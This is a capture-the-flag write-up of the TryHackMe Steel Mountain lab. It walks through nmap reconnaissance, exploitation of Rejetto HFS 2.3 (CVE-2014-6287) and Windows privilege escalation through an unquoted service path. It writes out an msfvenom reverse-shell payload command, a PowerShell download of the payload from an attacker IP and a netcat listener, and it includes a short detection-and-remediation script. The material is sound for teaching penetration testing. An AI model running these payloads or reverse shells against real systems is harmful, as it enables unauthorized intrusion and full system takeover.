If you are a subscriber, please do complete this room first. This will teach you a hell of a lot of things related to Windows, PowerShell usage and privilege escalation in Windows… If you are new to Windows, don't worry, you can still try this room. Though I'm not a big fan of Edison, one thing I heard about him was that he succeeded after 1K tries, so keep trying!!
So, let's jump right in…
Task 1 Introduction
So, first deploy the machine and wait for it to boot up.
Let's start the scanning phase with our good, old and promising friend, nmap:
After scanning I got this:
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 8.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server? syn-ack
| ssl-cert: Subject: commonName=steelmountain
| Issuer: commonName=steelmountain
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-07-08T20:51:28
| Not valid after: 2022-01-07T20:51:28
| MD5: 8709 a020 40c7 71ec 1907 0372 5df5 4657
| SHA-1: 3b81 38bf 7186 0a82 371c 3c1d 443a 9380 bb95 dc5e
|_ssl-date: 2021-07-09T21:01:01+00:00; -1s from scanner time.
8080/tcp open http syn-ack HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49156/tcp open msrpc syn-ack Microsoft Windows RPC
49163/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:28:8b:ec:85:33 (unknown)
| Names:
| STEELMOUNTAIN<20> Flags: <unique><active>
| STEELMOUNTAIN<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| Statistics:
| 02 28 8b ec 85 33 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 35667/tcp): CLEAN (Couldn't connect)
| Check 2 (port 24587/tcp): CLEAN (Couldn't connect)
| Check 3 (port 17430/udp): CLEAN (Failed to receive data)
| Check 4 (port 39146/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-09T21:00:55
|_ start_date: 2021-07-09T20:51:22
If you are not getting this result, try this nmap command: nmap <ip> -sV -A -vv. You can use your own nmap command too.
Let's look at the interesting ports (80, 3389, 8080, etc.) and start our enumeration.
We can see from the nmap result that there are two web servers running, one on port 80 and another on 8080.
On port 80 we can see a picture saying "employee of the month".
First question is:
Who is the employee of the month?
I think we have to reverse image search this, as I was not able to find any juicy info by inspecting the webpage's source.
The hint also says: reverse image search.
Do a Google search on it and you will surely get it.
So, first one done ✔.
Task 2 Initial Access
The other web server shows this. We can see here that HttpFileServer 2.3 is running (Server Info). If we click on it, we are redirected to another webpage and the name rejetto comes up.
The questions under Task 2 Initial Access:
1. Scan the machine with nmap. What is the other port running a web server on?
→ You know the answer, right??
2. Take a look at the other web server. What file server is running?
→ We also know this, don't we??
We can use the name rejetto to search for an exploit using searchsploit:
We can see various exploits for it, but look for the right version, then copy the exploit path and look it up in ExploitDB. Hint: the exploit is written by Avinash Thapa.
With this, we also got the answer to the 3rd question:
3. What is the CVE number to exploit this file server?
→ We got the right one; you should probably get it too.
4. Use Metasploit to get an initial shell. What is the user flag?
So now comes the exploitation phase.
Yeah, you heard right…
First we will do it with Metasploit (automated) and then manually, OK??
So, let's open msfconsole and search for rejetto.
Hey, if you haven't used Metasploit before, you can try the free THM room on Metasploit. But you can follow along; I will break down what is actually going to happen.
What we are doing is using this exploit to gain access to the target system through port 8080, on which HttpFileServer 2.3 (rejetto) is running. Here we will not use the ExploitDB exploit that we found while answering question #3; we will use that script later in the manual exploitation portion of this blog.
So, here in Metasploit, the exploit type is RCE (Remote Code Execution).
Inner working:
According to the CVE details for this vulnerability (CVE-2014-6287), the findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (otherwise known as HFS or HttpFileServer) 2.3x (versions prior to 2.3c) allows remote attackers to execute arbitrary programs via a %00 sequence in a search action. Source: link
And the payload portion will actually give us a remote shell from the target so we can control it.
Here are the settings options:
If you are confused about why we are using SRVHOST and SRVPORT in addition to LHOST and LPORT: SRVHOST/SRVPORT are where Metasploit hosts the web server that serves the payload to the target, while LHOST/LPORT are where the reverse shell connects back. See this: security.stackexchange
Now let's exploit it:
Yeah, we got a meterpreter shell!!!
Let's now find the flag, named user.txt.
A hint was given on the last question:
C:\Users\bill\Desktop
So, let's open a shell, change to that directory and get the flag:
Here we go. We have successfully got the user flag. Intentionally, I haven't included the flag because I'm cruel 😈.
Task 3 Privilege Escalation
So, now comes the most fun part: escalation of our privileges.
According to THM, we are instructed to use PowerUp.ps1 (a PowerShell script) by Will (aka harmj0y). Here is a blog post by Will himself.
Now we have to upload the PowerUp.ps1 script to the target so that we can enumerate the machine for privesc vectors.
We do that like this:
PowerUp.ps1 runs a series of checks on the target to look for vulnerabilities based on pre-determined signatures (service abuse checks, DLL hijacking opportunities, registry checks, etc.). In this case PowerUp reports that the machine is vulnerable to Unquoted Service Path (USP) exploitation in the path of the AdvancedSystemCareService9 service.
To learn more about USP: link
Now let's use it. To run the PowerShell script, we will use Metasploit's built-in PowerShell extension:
My PowerShell was already loaded earlier…
Now we get the scanning results on the screen.
NOTE:
Running Invoke-AllChecks will output any identifiable vulnerabilities along with specifications for any abuse functions.
A small portion of the generated result:
In THM, the question is: "Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?"
From the result, you can find the answer.
We can see from the result that C:\Program Files (x86)\IObit\Advanced SystemCare
is a directory with a space in its path, and the service path is not quoted → we can abuse this by placing a malicious file where the space splits the path, like this:
From here:
C:\Program Files (x86)\IObit\Advanced SystemCare
To:
C:\Program Files (x86)\IObit\Advanced
i.e. we have to make an executable file (payload) named Advanced, so that the service runs our file and we gain a shell.
But there is one catch: we have to check whether we can restart the service that uses that path.
We found that C:\Program Files (x86)\IObit\Advanced SystemCare
is the only path whose service can be restarted:
CanRestart : True
That means we can start with this.
We just have to make a payload with msfvenom:
$ msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=1234 -e x86/shikata_ga_nai -f exe -o Advanced.exe
Then upload it with the help of the previous meterpreter session.
Now let's copy this file (Advanced.exe) to our target directory C:\Program Files (x86)\IObit\. With Advanced.exe in place, the target path becomes C:\Program Files (x86)\IObit\Advanced.
We will use PowerShell for it:
Now the best part:
We only have to listen on port 1234 with exploit/multi/handler.
We use the same payload option as we used with msfvenom; otherwise, the payload will not work.
Now, as mentioned earlier in the room, we have to exploit a USP vulnerability where the service can be manipulated (restarted) by the current user (bill).
We know from the PowerUp.ps1 result that the service can be restarted by bill, but we should also make sure this service can actually be manipulated by the current user.
Yes, we can…
Let's look again at the result generated by the PowerUp.ps1 script. We saw:
In THM, it is written, “The service showed up as being unquoted (and could be exploited using this technique), however, in this case we have exploited weak file permissions on the service files instead.”
So now we are sure that we can stop and start the service, so that it is re-launched from the altered path.
NOTE:
Here it says "service is not responding", which totally makes sense, as the legitimate service binary is not what is being run…
Now see the listener:
Yup!!, you have seen it right!!, we got a shell as well as the root flag.
NOTE:
NT AUTHORITY\SYSTEM is the highest privileged account in Windows (just like root in Linux) and can do anything with the system.
So, the automated exploitation challenge is done….
Now, comes the Most Fun Part:
Task 4 Access and Escalation Without Metasploit (Manual)
In this task, we will find privesc vectors differently, using winPEAS.
We will now use the ExploitDB exploit we found with searchsploit in Task 2, question #3.
Let's first download it and go through the instructions written in it.
We can see the instructions.
The script first makes the target download nc.exe from a web server we host. On the second run, it uses nc.exe to establish a netcat C2 session back to us. That is why it has to be run multiple times.
So, first let's set the IP and port corresponding to your attacker machine:
Now let's get it done:
The target port is 8080, as that is where the rejetto web server is running.
So now let's get winPEAS.exe onto the target machine after downloading it from link.
We are downloading winPEAS.exe on the target rather than uploading it, because we don't have a meterpreter shell here, so we don't have that capability.
I used PowerShell to download this file.
Now let's run this:
> winPEAS.exe
We will get a ton of information about the system:
Just remember this:
Check the legend to see what each color indicates…
After some searching, you will get these lines:
Here we can see the same vulnerable paths that we got earlier in the automated exploitation portion. But if you remember correctly, we didn't get the 2nd file path back then, right??
Why is that? It was not there in the automated exploitation part, right??
Is it not running or something??? I… don't know, let's see…
Now in the room there is a question:
- What powershell -c command could we run to manually find out the service name?
(Format is "powershell -c "command here"")
We can see all services with their status: running/stopped…
But we have to find only the services that are running…
I have used Where-Object,
which is like the grep alternative (from Linux) in PowerShell for PowerShell users.
Yupp!!! We can see that IObit is not running, per the result generated by the PowerShell command.
NOTE: IObit was the other path shown in the result generated by winPEAS.exe previously.
Here we can't see the name properly; let's do some more slicing:
Now the name is clearly visible. We need it to restart the service, so that the service path is resolved again against the altered path.
Now let's see whether our user bill has sufficient permissions to do that.
First move to the C:\Program Files (x86)\IObit directory:
We have a hell of a lot of permissions on that path!!!
So, let's exploit the USP vulnerability:
Download (rather than upload) the msfvenom payload that we made earlier, or make it again.
Move to the "C:\Program Files (x86)\IObit" path:
Here, I used a PowerShell command:
powershell -c "Invoke-WebRequest http://10.8.112.253/Advanced.exe -OutFile Advanced"
Please note that I used Advanced as the output file name, as it will overwrite the previous file named Advanced.
You can also check the size of the Advanced file to see whether it has changed, to be sure that this command did its work successfully.
Now just by stopping and starting the service, we get a shell. Why??
Because when the service restarts, its unquoted path is resolved again, and it now hits our crafted payload.
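As an added illustration of the mechanism behind both the automated and the manual USP parts above, here is a small audit script that is not from the room, PowerUp or winPEAS: it enumerates the candidate executables Windows tries, in order, for an unquoted service path, flags candidates whose parent directory a low-privileged user can write to, and emits the quoted path that remediates the finding. The service names, binPath values and writable-directory set are constructed sample data, not values captured from the machine.

```python
# Constructed sample of service binPath values, modelled on the page's
# AdvancedSystemCareService9 finding (assumed values, not captured output).
SAMPLE_SERVICES: dict[str, str] = {
    "AdvancedSystemCareService9":
        r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "VendorSvc": r'"C:\Program Files\Vendor Tool\svc.exe" -run',
}
# Constructed ACL audit result: directories the low-privileged user (bill on
# the page) can write to. Assumed for the example.
WRITABLE_DIRS = {r"C:\Program Files (x86)\IObit"}


def candidate_executables(bin_path: str) -> list[str]:
    """Executables Windows tries, in order, for a service path.
    For an unquoted path with spaces, CreateProcess tries each space-delimited
    prefix (appending .exe when it has no extension) before the full path.
    Quoted paths and paths without spaces have one interpretation.
    Assumes unquoted entries carry no trailing arguments."""
    if bin_path.startswith('"') or " " not in bin_path:
        return [bin_path]
    parts = bin_path.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    candidates.append(bin_path)
    return candidates


def audit_unquoted_paths(services: dict[str, str], writable_dirs) -> list[tuple[str, str]]:
    """Flag (service, candidate) pairs where a candidate tried before the real
    binary sits in a directory the current user can write to."""
    writable = {d.lower().rstrip("\\") for d in writable_dirs}
    findings = []
    for name, path in services.items():
        for cand in candidate_executables(path)[:-1]:  # skip the real binary
            parent = cand.rsplit("\\", 1)[0].lower()
            if parent in writable:
                findings.append((name, cand))
    return findings


def quoted_bin_path(bin_path: str) -> str:
    """Remediation: quote an unquoted path containing spaces so the service
    manager has exactly one interpretation (the value to set with sc config binPath=)."""
    if bin_path.startswith('"') or " " not in bin_path:
        return bin_path
    return f'"{bin_path}"'
```

Running audit_unquoted_paths over the sample reports the IObit\Advanced.exe candidate (the same location the room's payload is dropped in), and re-auditing with the quoted path reports nothing.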
You know how to start and stop the service, as I mentioned it earlier in the automated exploitation part.
Before that set up a listener:
$ nc -nlvp 6666
Hell yeah!! We got a shell…
So, are we done now??
Nay!!!
We will add our own user and log in via RDP.
Now let's log in via RDP; I used Remmina here.
There we go…
Our account is created, so we can log in to our account via RDP. This is one reason why hacking Windows is more relieving than Linux to me (yes, if RDP were closed, the ending would not be as relieving as this 🤣).
If you have anything to ask, ask me here, on LinkedIn or on Twitter. See ya 👋!!